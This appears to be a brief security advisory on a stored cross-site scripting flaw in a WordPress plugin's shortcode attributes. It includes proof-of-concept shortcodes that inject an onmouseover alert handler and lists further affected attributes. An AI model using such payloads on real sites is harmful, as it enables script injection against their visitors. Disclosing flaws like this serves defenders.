The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
[yy_filter field=‘" style=background-color:red onmouseover=alert(/XSS/)//’] Other affected attributes: type, title [yy_filter_container class=‘" style=background-color:red onmouseover=alert(/XSS/)//’] Other affected attribute: action